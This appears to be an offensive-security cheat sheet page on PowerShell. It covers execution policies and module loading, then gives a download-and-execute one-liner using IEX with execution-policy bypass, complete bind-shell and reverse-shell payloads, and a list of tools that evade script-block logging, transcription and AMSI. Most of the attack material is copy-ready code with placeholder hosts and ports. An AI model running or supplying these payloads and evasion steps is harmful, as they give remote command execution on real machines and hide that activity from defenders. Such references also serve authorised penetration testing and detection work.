General PowerShell
Version & Execution Policies
Controls the conditions under which PowerShell loads configuration files and runs scripts
#Get current PowerShell version
$PSVersionTable.PSVersion
#Get effective execution policy
Get-ExecutionPolicy
#Get all execution policies that affect the current session
Get-ExecutionPolicy -List
#Change execution policy
Set-ExecutionPolicy <Bypass,Unrestricted,etc.>
#Launch set the execution policy
powershell.exe -ep <Bypass,Unrestricted,etc.>Modules & Scripts
Modules: A package that contains PowerShell members, such as cmdlets, providers, functions, workflows, variables, and aliases. PSM1 and PSD1 extensions.
Scripts: A file containing one or more functions. PS1 extensions.
#Load a script using dot-sourcing
. C:\path_to_script.ps1
#Import a module
Import-Module C:\Path_To_File.psd1/psm1
#Get imported modules
Get-Module
#Get commands
Get-Command -Module '<module_name>'File Transfers & Executions
#Download a file
powershell -c "(new-object System.Net.WebClient).DownloadFile('http…/path/','local_path_to_save_file.ext')"
#Execute a file
powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File file.ps1
#Download and execute a file
powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile IEX (New-Object System.Net.WebClient).DownloadString('http://../file.ps1')Bind and Reverse Shell Payloads (Unencrypted)
#Bind Shell Payload
powershell -c "$listener = New-Object System.Net.Sockets.TcpListener('0.0.0.0',<PORT_TO_LISTEN>);$listener.start();$client = $listener.AcceptTcpClient();$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String);$sendback2 = $sendback + ‘PS ’ + (pwd).Path + ‘> ’;$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush();}$client.Close();$listener.Stop()"
#Reverse Shell
powershell.exe -c "$client = New-Object System.Net.Sockets.TcpClient('<IP_to_CONNECT>',<PORT_TO_CONNECT>); $stream = $client.GetStream(); [byte[]]$bytes=0..65535|%{0}; while(($i = $stream.Read($bytes,0,$bytes.Length)) -ne 0) { $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0,$i); $sendback = (iex $data 2>&1 | Out-String); $sendback2 = $sendback + 'PS ' + (pwd).Path + '> '; $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2); $stream.Write($sendbyte,0,$sendbyte.Length); $stream.Flush(); } $client.Close();"Detections
System-Wide Transcription: All commands and output are locally logged
Script-Block Logging: Records blocks of code as they are executed by PowerShell
Warning Level: Based on a list of known bad keywords. Enabled on Windows 8.1 onwards
Verbose: Everything is logged
Anti-Malware Scan Interface (AMSI): Passes the partial script to Windows AV to perform a static, signature check on the partial script
Constrained Language Mode (CLM): Restricted running of non-Microsoft signed tools.
Bypassing Detections (Windows Defender)
AMSITrigger: Identifies malicious strings being flagged in a PowerShell file.
Invoke-Obfuscation: A PowerShell command and script obfuscator.
Invisi-Shell: Starts a new PowerShell session bypassing System-Wide Transcription, Script-Block Logging, and Anti-malware Scan Interface (AMSI).
Last updated